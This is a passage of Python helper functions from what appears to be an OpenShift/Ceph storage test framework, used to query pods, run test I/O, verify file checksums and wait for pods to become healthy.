return self.pod_data["spec"]["nodeSelector"]["kubernetes.io/hostname"]
else:
return self.pod_data["spec"]["nodeName"]
# Helper functions for Pods
def get_all_pods(
namespace=None,
selector=None,
selector_label="app",
exclude_selector=False,
wait=False,
):
"""
Get all pods in a namespace.
Args:
namespace (str): Name of the namespace
If namespace is None - get all pods
selector (list) : List of the resource selector to search with.
Example: ['alertmanager','prometheus']
selector_label (str): Label of selector (default: app).
exclude_selector (bool): If list of the resource selector not to search with
Returns:
list: List of Pod objects
"""
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
# In case of >4 worker nodes node failures automatic failover of pods to
# other nodes will happen.
# So, we are waiting for the pods to come up on new node
if wait:
wait_time = 180
logger.info(f"Waiting for {wait_time}s for the pods to stabilize")
time.sleep(wait_time)
pods = ocp_pod_obj.get()["items"]
if selector:
if exclude_selector:
pods_new = [
pod
for pod in pods
if pod["metadata"].get("labels", {}).get(selector_label) not in selector
]
else:
pods_new = [
pod
for pod in pods
if pod["metadata"].get("labels", {}).get(selector_label) in selector
]
pods = pods_new
pod_objs = [Pod(**pod) for pod in pods]
return pod_objs
def get_ceph_tools_pod():
"""
Get the Ceph tools pod
Returns:
Pod object: The Ceph tools pod object
"""
ocp_pod_obj = OCP(
kind=constants.POD, namespace=config.ENV_DATA["cluster_namespace"]
)
ct_pod_items = ocp_pod_obj.get(selector="app=rook-ceph-tools")["items"]
if not ct_pod_items:
# setup ceph_toolbox pod if the cluster has been setup by some other CI
setup_ceph_toolbox()
ct_pod_items = ocp_pod_obj.get(selector="app=rook-ceph-tools")["items"]
assert ct_pod_items, "No Ceph tools pod found"
# In the case of node failure, the CT pod will be recreated with the old
# one in status Terminated. Therefore, need to filter out the Terminated pod
running_ct_pods = list()
for pod in ct_pod_items:
if (
ocp_pod_obj.get_resource_status(pod.get("metadata").get("name"))
== constants.STATUS_RUNNING
):
running_ct_pods.append(pod)
assert running_ct_pods, "No running Ceph tools pod found"
ceph_pod = Pod(**running_ct_pods[0])
return ceph_pod
def get_csi_provisioner_pod(interface):
"""
Get the provisioner pod based on interface
Returns:
Pod object: The provisioner pod object based on iterface
"""
ocp_pod_obj = OCP(
kind=constants.POD, namespace=config.ENV_DATA["cluster_namespace"]
)
selector = (
"app=csi-rbdplugin-provisioner"
if (interface == constants.CEPHBLOCKPOOL)
else "app=csi-cephfsplugin-provisioner"
)
provision_pod_items = ocp_pod_obj.get(selector=selector)["items"]
assert provision_pod_items, f"No {interface} provisioner pod found"
provisioner_pod = (
Pod(**provision_pod_items[0]).name,
Pod(**provision_pod_items[1]).name,
)
return provisioner_pod
def get_csi_snapshoter_pod():
"""
Get the csi snapshot controller pod
Returns:
Pod object: csi snapshot controller pod
"""
ocp_pod_obj = OCP(
kind=constants.POD, namespace="openshift-cluster-storage-operator"
)
selector = "app=csi-snapshot-controller"
snapshotner_pod = ocp_pod_obj.get(selector=selector)["items"]
snapshotner_pod = Pod(**snapshotner_pod[0]).name
return snapshotner_pod
def get_rgw_pods(rgw_label=constants.RGW_APP_LABEL, namespace=None):
"""
Fetches info about rgw pods in the cluster
Args:
rgw_label (str): label associated with rgw pods
(default: defaults.RGW_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: none)
Returns:
list: Pod objects of rgw pods
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
rgws = get_pods_having_label(rgw_label, namespace)
return [Pod(**rgw) for rgw in rgws]
def get_ocs_operator_pod(ocs_label=constants.OCS_OPERATOR_LABEL, namespace=None):
"""
Fetches info about rgw pods in the cluster
Args:
ocs_label (str): label associated with ocs_operator pod
(default: defaults.OCS_OPERATOR_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: none)
Returns:
Pod object: ocs_operator pod object
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
ocs_operator = get_pods_having_label(ocs_label, namespace)
ocs_operator_pod = Pod(**ocs_operator[0])
return ocs_operator_pod
def list_ceph_images(pool_name="rbd"):
"""
Args:
pool_name (str): Name of the pool to get the ceph images
Returns (List): List of RBD images in the pool
"""
ct_pod = get_ceph_tools_pod()
return ct_pod.exec_ceph_cmd(ceph_cmd=f"rbd ls {pool_name}", format="json")
@retry(TypeError, tries=5, delay=2, backoff=1)
def check_file_existence(pod_obj, file_path):
"""
Check if file exists inside the pod
Args:
pod_obj (Pod): The object of the pod
file_path (str): The full path of the file to look for inside
the pod
Returns:
bool: True if the file exist, False otherwise
"""
try:
check_if_executable_in_path(pod_obj.exec_cmd_on_pod("which find"))
except CommandFailed:
pod_obj.install_packages("findutils")
ret = pod_obj.exec_cmd_on_pod(f'bash -c "find {file_path}"')
if re.search(file_path, ret):
return True
return False
def get_file_path(pod_obj, file_name):
"""
Get the full path of the file
Args:
pod_obj (Pod): The object of the pod
file_name (str): The name of the file for which path to get
Returns:
str: The full path of the file
"""
path = (
pod_obj.get()
.get("spec")
.get("containers")[0]
.get("volumeMounts")[0]
.get("mountPath")
)
file_path = os.path.join(path, file_name)
return file_path
def cal_md5sum(pod_obj, file_name, block=False):
"""
Calculates the md5sum of the file
Args:
pod_obj (Pod): The object of the pod
file_name (str): The name of the file for which md5sum to be calculated
block (bool): True if the volume mode of PVC used on pod is 'Block'.
file_name will be the devicePath in this case.
Returns:
str: The md5sum of the file
"""
file_path = file_name if block else get_file_path(pod_obj, file_name)
md5sum_cmd_out = pod_obj.exec_cmd_on_pod(
command=f'bash -c "md5sum {file_path}"', out_yaml_format=False
)
md5sum = md5sum_cmd_out.split()[0]
logger.info(f"md5sum of file {file_name}: {md5sum}")
return md5sum
def verify_data_integrity(pod_obj, file_name, original_md5sum, block=False):
"""
Verifies existence and md5sum of file created from first pod
Args:
pod_obj (Pod): The object of the pod
file_name (str): The name of the file for which md5sum to be calculated
original_md5sum (str): The original md5sum of the file
block (bool): True if the volume mode of PVC used on pod is 'Block'.
file_name will be the devicePath in this case.
Returns:
bool: True if the file exists and md5sum matches
Raises:
AssertionError: If file doesn't exist or md5sum mismatch
"""
file_path = file_name if block else get_file_path(pod_obj, file_name)
assert check_file_existence(pod_obj, file_path), f"File {file_name} doesn't exists"
current_md5sum = cal_md5sum(pod_obj, file_name, block)
logger.info(f"Original md5sum of file: {original_md5sum}")
logger.info(f"Current md5sum of file: {current_md5sum}")
assert current_md5sum == original_md5sum, "Data corruption found"
logger.info(f"File {file_name} exists and md5sum matches")
return True
def get_fio_rw_iops(pod_obj):
"""
Execute FIO on a pod
Args:
pod_obj (Pod): The object of the pod
"""
fio_result = pod_obj.get_fio_results()
logging.info(f"FIO output: {fio_result}")
logging.info("IOPs after FIO:")
logging.info(f"Read: {fio_result.get('jobs')[0].get('read').get('iops')}")
logging.info(f"Write: {fio_result.get('jobs')[0].get('write').get('iops')}")
def run_io_in_bg(pod_obj, expect_to_fail=False, fedora_dc=False):
"""
Run I/O in the background
Args:
pod_obj (Pod): The object of the pod
expect_to_fail (bool): True for the command to be expected to fail
(disruptive operations), False otherwise
fedora_dc (bool): set to False by default. If set to True, it runs IO in
background on a fedora dc pod.
Returns:
Thread: A thread of the I/O execution
"""
logger.info(f"Running I/O on pod {pod_obj.name}")
def exec_run_io_cmd(pod_obj, expect_to_fail, fedora_dc):
"""
Execute I/O
"""
try:
# Writing content to a new file every 0.01 seconds.
# Without sleep, the device will run out of space very quickly -
# 5-10 seconds for a 5GB device
if fedora_dc:
FILE = FEDORA_TEST_FILE
else:
FILE = TEST_FILE
pod_obj.exec_cmd_on_pod(
command=f'bash -c "let i=0; while true; do echo '
f'{TEXT_CONTENT} >> {FILE}$i; let i++; sleep 0.01; done"',
timeout=2400,
)
# Once the pod gets deleted, the I/O execution will get terminated.
# Hence, catching this exception
except CommandFailed as ex:
if expect_to_fail:
if re.search("code 137", str(ex)) or (re.search("code 143", str(ex))):
logger.info("I/O command got terminated as expected")
return
raise ex
thread = Thread(target=exec_run_io_cmd, args=(pod_obj, expect_to_fail, fedora_dc))
thread.start()
time.sleep(2)
# Checking file existence
if fedora_dc:
FILE = FEDORA_TEST_FILE
else:
FILE = TEST_FILE
test_file = FILE + "1"
# Check I/O started
try:
for sample in TimeoutSampler(
timeout=20,
sleep=1,
func=check_file_existence,
pod_obj=pod_obj,
file_path=test_file,
):
if sample:
break
logger.info(f"Waiting for I/O to start inside {pod_obj.name}")
except TimeoutExpiredError:
logger.error(
f"Wait timeout: I/O failed to start inside {pod_obj.name}. "
"Collect file list."
)
parent_dir = os.path.join(TEST_FILE, os.pardir)
pod_obj.exec_cmd_on_pod(
command=f"ls -l {os.path.abspath(parent_dir)}", out_yaml_format=False
)
raise TimeoutExpiredError(f"I/O failed to start inside {pod_obj.name}")
return thread
def get_admin_key_from_ceph_tools():
"""
Fetches admin key secret from ceph
Returns:
admin keyring encoded with base64 as a string
"""
tools_pod = get_ceph_tools_pod()
out = tools_pod.exec_ceph_cmd(ceph_cmd="ceph auth get-key client.admin")
base64_output = base64.b64encode(out["key"].encode()).decode()
return base64_output
def run_io_and_verify_mount_point(pod_obj, bs="10M", count="950"):
"""
Run I/O on mount point
Args:
pod_obj (Pod): The object of the pod
bs (str): Read and write up to bytes at a time
count (str): Copy only N input blocks
Returns:
used_percentage (str): Used percentage on mount point
"""
pod_obj.exec_cmd_on_pod(
command=f"dd if=/dev/urandom of=/var/lib/www/html/dd_a bs={bs} count={count}"
)
# Verify data's are written to mount-point
mount_point = pod_obj.exec_cmd_on_pod(command="df -kh")
mount_point = mount_point.split()
used_percentage = mount_point[mount_point.index("/var/lib/www/html") - 1]
return used_percentage
def get_pods_having_label(label, namespace):
"""
Fetches pod resources with given label in given namespace
Args:
label (str): label which pods might have
namespace (str): Namespace in which to be looked up
Return:
list: of pods info
"""
ocp_pod = OCP(kind=constants.POD, namespace=namespace)
pods = ocp_pod.get(selector=label).get("items")
return pods
def get_deployments_having_label(label, namespace):
"""
Fetches deployment resources with given label in given namespace
Args:
label (str): label which deployments might have
namespace (str): Namespace in which to be looked up
Return:
list: deployment OCP instances
"""
ocp_deployment = OCP(kind=constants.DEPLOYMENT, namespace=namespace)
pods = ocp_deployment.get(selector=label).get("items")
return pods
def get_mds_pods(mds_label=constants.MDS_APP_LABEL, namespace=None):
"""
Fetches info about mds pods in the cluster
Args:
mds_label (str): label associated with mds pods
(default: defaults.MDS_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of mds pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
mdss = get_pods_having_label(mds_label, namespace)
mds_pods = [Pod(**mds) for mds in mdss]
return mds_pods
def get_mon_pods(mon_label=constants.MON_APP_LABEL, namespace=None):
"""
Fetches info about mon pods in the cluster
Args:
mon_label (str): label associated with mon pods
(default: defaults.MON_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of mon pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
mons = get_pods_having_label(mon_label, namespace)
mon_pods = [Pod(**mon) for mon in mons]
return mon_pods
def get_mgr_pods(mgr_label=constants.MGR_APP_LABEL, namespace=None):
"""
Fetches info about mgr pods in the cluster
Args:
mgr_label (str): label associated with mgr pods
(default: defaults.MGR_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of mgr pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
mgrs = get_pods_having_label(mgr_label, namespace)
mgr_pods = [Pod(**mgr) for mgr in mgrs]
return mgr_pods
def get_osd_pods(osd_label=constants.OSD_APP_LABEL, namespace=None):
"""
Fetches info about osd pods in the cluster
Args:
osd_label (str): label associated with osd pods
(default: defaults.OSD_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of osd pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
osds = get_pods_having_label(osd_label, namespace)
osd_pods = [Pod(**osd) for osd in osds]
return osd_pods
def get_osd_prepare_pods(
osd_prepare_label=constants.OSD_PREPARE_APP_LABEL,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
):
"""
Fetches info about osd prepare pods in the cluster
Args:
osd_prepare_label (str): label associated with osd prepare pods
(default: constants.OSD_PREPARE_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list: OSD prepare pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
osds = get_pods_having_label(osd_prepare_label, namespace)
osd_pods = [Pod(**osd) for osd in osds]
return osd_pods
def get_osd_deployments(osd_label=constants.OSD_APP_LABEL, namespace=None):
"""
Fetches info about osd deployments in the cluster
Args:
osd_label (str): label associated with osd deployments
(default: defaults.OSD_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list: OSD deployment OCS instances
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
osds = get_deployments_having_label(osd_label, namespace)
osd_deployments = [OCS(**osd) for osd in osds]
return osd_deployments
def get_pod_count(label, namespace=None):
namespace = namespace or config.ENV_DATA["cluster_namespace"]
pods = get_pods_having_label(label=label, namespace=namespace)
return len(pods)
def get_cephfsplugin_provisioner_pods(
cephfsplugin_provisioner_label=constants.CSI_CEPHFSPLUGIN_PROVISIONER_LABEL,
namespace=None,
):
"""
Fetches info about CSI Cephfs plugin provisioner pods in the cluster
Args:
cephfsplugin_provisioner_label (str): label associated with cephfs
provisioner pods
(default: defaults.CSI_CEPHFSPLUGIN_PROVISIONER_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : csi-cephfsplugin-provisioner Pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
pods = get_pods_having_label(cephfsplugin_provisioner_label, namespace)
fs_plugin_pods = [Pod(**pod) for pod in pods]
return fs_plugin_pods
def get_rbdfsplugin_provisioner_pods(
rbdplugin_provisioner_label=constants.CSI_RBDPLUGIN_PROVISIONER_LABEL,
namespace=None,
):
"""
Fetches info about CSI Cephfs plugin provisioner pods in the cluster
Args:
rbdplugin_provisioner_label (str): label associated with RBD
provisioner pods
(default: defaults.CSI_RBDPLUGIN_PROVISIONER_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : csi-rbdplugin-provisioner Pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
pods = get_pods_having_label(rbdplugin_provisioner_label, namespace)
ebd_plugin_pods = [Pod(**pod) for pod in pods]
return ebd_plugin_pods
def get_pod_obj(name, namespace=None):
"""
Returns the pod obj for the given pod
Args:
name (str): Name of the resources
Returns:
obj : A pod object
"""
ocp_obj = OCP(api_version="v1", kind=constants.POD, namespace=namespace)
ocp_dict = ocp_obj.get(resource_name=name)
pod_obj = Pod(**ocp_dict)
return pod_obj
def get_pod_logs(
pod_name, container=None, namespace=defaults.ROOK_CLUSTER_NAMESPACE, previous=False
):
"""
Get logs from a given pod
pod_name (str): Name of the pod
container (str): Name of the container
namespace (str): Namespace of the pod
previous (bool): True, if pod previous log required. False otherwise.
Returns:
str: Output from 'oc get logs <pod_name> command
"""
pod = OCP(kind=constants.POD, namespace=namespace)
cmd = f"logs {pod_name}"
if container:
cmd += f" -c {container}"
if previous:
cmd += " --previous"
return pod.exec_oc_cmd(cmd, out_yaml_format=False)
def get_pod_node(pod_obj):
"""
Get the node that the pod is running on
Args:
pod_obj (OCS): The pod object
Returns:
ocs_ci.ocs.ocp.OCP: The node object
"""
node_name = pod_obj.get().get("spec").get("nodeName")
return node.get_node_objs(node_names=node_name)[0]
def delete_pods(pod_objs, wait=True):
"""
Deletes list of the pod objects
Args:
pod_objs (list): List of the pod objects to be deleted
wait (bool): Determines if the delete command should wait for
completion
"""
for pod in pod_objs:
pod.delete(wait=wait)
def validate_pods_are_respinned_and_running_state(pod_objs_list):
"""
Verifies the list of the pods are respinned and in running state
Args:
pod_objs_list (list): List of the pods obj
Returns:
bool : True if the pods are respinned and running, False otherwise
Raises:
ResourceWrongStatusException: In case the resources hasn't
reached the Running state
"""
for pod in pod_objs_list:
helpers.wait_for_resource_state(pod, constants.STATUS_RUNNING, timeout=180)
for pod in pod_objs_list:
pod_obj = pod.get()
start_time = pod_obj["status"]["startTime"]
ts = time.strptime(start_time, "%Y-%m-%dT%H:%M:%SZ")
ts = calendar.timegm(ts)
current_time_utc = time.time()
sec = current_time_utc - ts
if (sec / 3600) >= 1:
logger.error(
f"Pod {pod.name} is not respinned, the age of the pod is {start_time}"
)
return False
return True
def verify_node_name(pod_obj, node_name):
"""
Verifies that the pod is running on a particular node
Args:
pod_obj (Pod): The pod object
node_name (str): The name of node to check
Returns:
bool: True if the pod is running on a particular node, False otherwise
"""
logger.info(
f"Checking whether the pod {pod_obj.name} is running on " f"node {node_name}"
)
actual_node = pod_obj.get().get("spec").get("nodeName")
if actual_node == node_name:
logger.info(
f"The pod {pod_obj.name} is running on the specified node " f"{actual_node}"
)
return True
else:
logger.info(
f"The pod {pod_obj.name} is not running on the specified node "
f"specified node: {node_name}, actual node: {actual_node}"
)
return False
def get_pvc_name(pod_obj):
"""
Function to get pvc_name from pod_obj
Args:
pod_obj (str): The pod object
Returns:
str: The pvc name of a given pod_obj,
Raises:
UnavailableResourceException: If no pvc attached
"""
pvc = pod_obj.get().get("spec").get("volumes")[0].get("persistentVolumeClaim")
if not pvc:
raise UnavailableResourceException
return pvc.get("claimName")
def get_used_space_on_mount_point(pod_obj):
"""
Get the used space on a mount point
Args:
pod_obj (POD): The pod object
Returns:
int: Percentage represent the used space on the mount point
"""
# Verify data's are written to mount-point
mount_point = pod_obj.exec_cmd_on_pod(command="df -kh")
mount_point = mount_point.split()
used_percentage = mount_point[mount_point.index(constants.MOUNT_POINT) - 1]
return used_percentage
def get_plugin_pods(interface, namespace=None):
"""
Fetches info of csi-cephfsplugin pods or csi-rbdplugin pods
Args:
interface (str): Interface type. eg: CephBlockPool, CephFileSystem
namespace (str): Name of cluster namespace
Returns:
list : csi-cephfsplugin pod objects or csi-rbdplugin pod objects
"""
if interface == constants.CEPHFILESYSTEM:
plugin_label = constants.CSI_CEPHFSPLUGIN_LABEL
if interface == constants.CEPHBLOCKPOOL:
plugin_label = constants.CSI_RBDPLUGIN_LABEL
namespace = namespace or config.ENV_DATA["cluster_namespace"]
plugins_info = get_pods_having_label(plugin_label, namespace)
plugin_pods = [Pod(**plugin) for plugin in plugins_info]
return plugin_pods
def get_plugin_provisioner_leader(interface, namespace=None, leader_type="provisioner"):
"""
Get csi-cephfsplugin-provisioner or csi-rbdplugin-provisioner leader pod
Args:
interface (str): Interface type. eg: CephBlockPool, CephFileSystem
namespace (str): Name of cluster namespace
leader_type (str): Parameter to check the lease. eg: 'snapshotter' to
select external-snapshotter leader holder
Returns:
Pod: csi-cephfsplugin-provisioner or csi-rbdplugin-provisioner leader
pod
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
leader_types = {
"provisioner": namespace,
"snapshotter": f"external-snapshotter-leader-{namespace}",
"resizer": f"external-resizer-{namespace}",
"attacher": f"external-attacher-{namespace}",
}
if interface == constants.CEPHBLOCKPOOL:
lease_cmd = f"get leases {leader_types[leader_type]}-rbd-csi-ceph-com -o yaml"
elif interface == constants.CEPHFILESYSTEM:
lease_cmd = (
f"get leases {leader_types[leader_type]}-cephfs-csi-ceph-com " "-o yaml"
)
ocp_obj = ocp.OCP(kind=constants.POD, namespace=namespace)
lease = ocp_obj.exec_oc_cmd(command=lease_cmd)
leader = lease.get("spec").get("holderIdentity").strip()
assert leader, "Couldn't identify plugin provisioner leader pod."
logger.info(f"Plugin provisioner leader pod is {leader}")
ocp_obj._resource_name = leader
leader_pod = Pod(**ocp_obj.get())
return leader_pod
def get_operator_pods(operator_label=constants.OPERATOR_LABEL, namespace=None):
"""
Fetches info about rook-ceph-operator pods in the cluster
Args:
operator_label (str): Label associated with rook-ceph-operator pod
namespace (str): Namespace in which ceph cluster lives
Returns:
list : of rook-ceph-operator pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
operators = get_pods_having_label(operator_label, namespace)
operator_pods = [Pod(**operator) for operator in operators]
return operator_pods
def upload(pod_name, localpath, remotepath, namespace=None):
"""
Upload a file to pod
Args:
pod_name (str): Name of the pod
localpath (str): Local file to upload
remotepath (str): Target path on the pod
"""
namespace = namespace or constants.DEFAULT_NAMESPACE
cmd = (
f"oc -n {namespace} cp {os.path.expanduser(localpath)} {pod_name}:{remotepath}"
)
run_cmd(cmd)
def download_file_from_pod(pod_name, remotepath, localpath, namespace=None):
"""
Download a file from a pod
Args:
pod_name (str): Name of the pod
remotepath (str): Target path on the pod
localpath (str): Local file to upload
namespace (str): The namespace of the pod
"""
namespace = namespace or constants.DEFAULT_NAMESPACE
cmd = (
f"oc -n {namespace} cp {pod_name}:{remotepath} {os.path.expanduser(localpath)}"
)
run_cmd(cmd)
def wait_for_storage_pods(timeout=200):
"""
Check all OCS pods status, they should be in Running or Completed state
Args:
timeout (int): Number of seconds to wait for pods to get into correct
state
"""
all_pod_obj = get_all_pods(namespace=defaults.ROOK_CLUSTER_NAMESPACE)
# Ignoring pods with "app=rook-ceph-detect-version" app label
all_pod_obj = [
pod
for pod in all_pod_obj
if pod.get_labels()
and constants.ROOK_CEPH_DETECT_VERSION_LABEL not in pod.get_labels()
]
for pod_obj in all_pod_obj:
state = constants.STATUS_RUNNING
if any(i in pod_obj.name for i in ["-1-deploy", "ocs-deviceset"]):
state = constants.STATUS_COMPLETED
try:
helpers.wait_for_resource_state(
resource=pod_obj, state=state, timeout=timeout
)
except ResourceWrongStatusException:
# 'rook-ceph-crashcollector' on the failed node stucks at
# pending state. BZ 1810014 tracks it.
# Ignoring 'rook-ceph-crashcollector' pod health check as
# WA and deleting its deployment so that the pod
# disappears. Will revert this WA once the BZ is fixed
if "rook-ceph-crashcollector" in pod_obj.name:
ocp_obj = ocp.OCP(namespace=defaults.ROOK_CLUSTER_NAMESPACE)
pod_name = pod_obj.name
deployment_name = "-".join(pod_name.split("-")[:-2])
command = f"delete deployment {deployment_name}"
ocp_obj.exec_oc_cmd(command=command)
logger.info(f"Deleted deployment for pod {pod_obj.name}")
else:
raise
def verify_pods_upgraded(old_images, selector, count=1, timeout=720):
"""
Verify that all pods do not have old image.
Args:
old_images (set): Set with old images.
selector (str): Selector (e.g. app=ocs-osd)
count (int): Number of resources for selector.
timeout (int): Timeout in seconds to wait for pods to be upgraded.
Raises:
TimeoutException: If the pods didn't get upgraded till the timeout.
"""
namespace = config.ENV_DATA["cluster_namespace"]
pod = OCP(
kind=constants.POD,
namespace=namespace,
)
info_message = (
f"Waiting for {count} pods with selector: {selector} to be running "
f"and upgraded."
)
logger.info(info_message)
start_time = time.time()
selector_label, selector_value = selector.split("=")
while True:
pod_count = 0
try:
pods = get_all_pods(namespace, [selector_value], selector_label)
pods_len = len(pods)
logger.info(f"Found {pods_len} pod(s) for selector: {selector}")
if pods_len != count:
logger.warning(
f"Number of found pods {pods_len} is not as expected: " f"{count}"
)
for pod in pods:
verify_images_upgraded(old_images, pod.get())
pod_count += 1
except CommandFailed as ex:
logger.warning(
f"Failed when getting pods with selector {selector}." f"Error: {ex}"
)
except NonUpgradedImagesFoundError as ex:
logger.warning(ex)
check_timeout_reached(start_time, timeout, info_message)
if pods_len != count:
logger.error(f"Found pods: {pods_len} but expected: {count}!")
elif pod_count == count:
return
def get_noobaa_pods(noobaa_label=constants.NOOBAA_APP_LABEL, namespace=None):
"""
Fetches info about noobaa pods in the cluster
Args:
noobaa_label (str): label associated with osd pods
(default: defaults.NOOBAA_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of noobaa pod objects
"""
namespace = namespace or config.ENV_DATA["cluster_namespace"]
noobaas = get_pods_having_label(noobaa_label, namespace)
noobaa_pods = [Pod(**noobaa) for noobaa in noobaas]
return noobaa_pods
def wait_for_dc_app_pods_to_reach_running_state(
dc_pod_obj, timeout=120, exclude_state=None
):
"""
Wait for DC app pods to reach running state
Args:
dc_pod_obj (list): list of dc app pod objects
timeout (int): Timeout in seconds to wait for pods to be in Running
state.
exclude_state (str): A resource state to ignore
"""
for pod_obj in dc_pod_obj:
name = pod_obj.get_labels().get("name")
dpod_list = get_all_pods(selector_label=f"name={name}", wait=True)
for dpod in dpod_list:
if "-1-deploy" not in dpod.name and dpod.status != exclude_state:
helpers.wait_for_resource_state(
dpod, constants.STATUS_RUNNING, timeout=timeout
)
def delete_deploymentconfig_pods(pod_obj):
"""
Delete a DeploymentConfig pod and all the pods that are controlled by it
Args:
pod_obj (Pod): Pod object
"""
dc_ocp_obj = ocp.OCP(kind=constants.DEPLOYMENTCONFIG, namespace=pod_obj.namespace)
pod_data_list = dc_ocp_obj.get().get("items")
if pod_data_list:
for pod_data in pod_data_list:
if pod_obj.get_labels().get("name") == pod_data.get("metadata").get("name"):
dc_ocp_obj.delete(resource_name=pod_obj.get_labels().get("name"))
dc_ocp_obj.wait_for_delete(
resource_name=pod_obj.get_labels().get("name")
)
def wait_for_new_osd_pods_to_come_up(number_of_osd_pods_before):
status_options = ["Init:1/4", "Init:2/4", "Init:3/4", "PodInitializing", "Running"]
try:
for osd_pods in TimeoutSampler(timeout=180, sleep=3, func=get_osd_pods):
# Check if the new osd pods has started to come up
new_osd_pods = osd_pods[number_of_osd_pods_before:]
new_osd_pods_come_up = [
pod.status() in status_options for pod in new_osd_pods
]
if any(new_osd_pods_come_up):
logging.info("One or more of the new osd pods has started to come up")
break
except TimeoutExpiredError:
logging.warning("None of the new osd pods reached the desired status")
def get_pod_restarts_count(namespace=defaults.ROOK_CLUSTER_NAMESPACE):
"""
Gets the dictionary of pod and its restart count for all the pods in a given namespace
Returns:
dict: dictionary of pod name and its corresponding restart count
"""
list_of_pods = get_all_pods(namespace)
restart_dict = {}
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
for p in list_of_pods:
# we don't want to compare osd-prepare and canary pods as they get created freshly when an osd need to be added.
if (
"rook-ceph-osd-prepare" not in p.name
and "rook-ceph-drain-canary" not in p.name
):
restart_dict[p.name] = int(ocp_pod_obj.get_resource(p.name, "RESTARTS"))
logging.info(f"get_pod_restarts_count: restarts dict = {restart_dict}")
return restart_dict
def check_pods_in_running_state(namespace=defaults.ROOK_CLUSTER_NAMESPACE):
"""
checks whether all the pods in a given namespace are in Running state or not
Returns:
Boolean: True, if all pods in Running state. False, otherwise
"""
ret_val = True
list_of_pods = get_all_pods(namespace)
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
for p in list_of_pods:
# we don't want to compare osd-prepare and canary pods as they get created freshly when an osd need to be added.
if (
"rook-ceph-osd-prepare" not in p.name
and "rook-ceph-drain-canary" not in p.name
):
status = ocp_pod_obj.get_resource(p.name, "STATUS")
if (
("rook-ceph-osd-prepare" not in p.name)
and ("rook-ceph-drain-canary" not in p.name)
and ("debug" not in p.name)
):
status = ocp_pod_obj.get_resource(p.name, "STATUS")
if status not in "Running":
logging.error(
f"The pod {p.name} is in {status} state. Expected = Running"
)
ret_val = False
return ret_val
def get_running_state_pods(namespace=defaults.ROOK_CLUSTER_NAMESPACE):
"""
Checks the running state pods in a given namespace.
Returns:
List: all the pod objects that are in running state only
"""
list_of_pods = get_all_pods(namespace)
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
running_pods_object = list()
for pod in list_of_pods:
status = ocp_pod_obj.get_resource(pod.name, "STATUS")
if "Running" in status:
running_pods_object.append(pod)
return running_pods_object
def wait_for_pods_to_be_running(timeout=200, namespace=defaults.ROOK_CLUSTER_NAMESPACE):
"""
Wait for all the pods in a specific namespace to be running.
Args:
timeout (int): time to wait for pods to be running
namespace (str): the namespace ot the pods
Returns:
bool: True, if all pods in Running state. False, otherwise
"""
try:
for pods_running in TimeoutSampler(
timeout=timeout,
sleep=10,
func=check_pods_in_running_state,
namespace=namespace,
):
# Check if all the pods in running state
if pods_running:
logging.info("All the pods reached status running!")
return True
except TimeoutExpiredError:
logging.warning(
f"Not all the pods reached status running " f"after {timeout} seconds"
)
return False
def list_of_nodes_running_pods(selector, namespace=defaults.ROOK_CLUSTER_NAMESPACE):
"""
The function returns the list of nodes for the given selector
Args:
selector (str): The resource selector to search with
Returns:
list: a list of nodes that runs the given selector pods
"""
pod_obj_list = get_all_pods(namespace=namespace, selector=[selector])
pods_running_nodes = [get_pod_node(pod) for pod in pod_obj_list]
logger.info(f"{selector} running on nodes {pods_running_nodes}")
return list(set(pods_running_nodes))
def get_osd_removal_pod_name(osd_id, timeout=60):
"""
Get the osd removal pod name
Args:
osd_id (int): The osd's id to get the osd removal pod name
timeout (int): The time to wait for getting the osd removal pod name
Returns:
str: The osd removal pod name
"""
try:
for osd_removal_pod_names in TimeoutSampler(
timeout=timeout,
sleep=5,
func=get_pod_name_by_pattern,
pattern=f"ocs-osd-removal-{osd_id}",
):
if osd_removal_pod_names:
osd_removal_pod_name = osd_removal_pod_names[0]
logging.info(f"Found pod {osd_removal_pod_name}")
return osd_removal_pod_name
except TimeoutExpiredError:
logger.warning(f"Failed to get pod ocs-osd-removal-{osd_id}")
return None
def check_toleration_on_pods(toleration_key=constants.TOLERATION_KEY):
"""
Function to check toleration on pods
Args:
toleration_key (str): The toleration key to check
"""
pod_objs = get_all_pods(
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
selector=[constants.TOOL_APP_LABEL],
exclude_selector=True,
)
flag = False
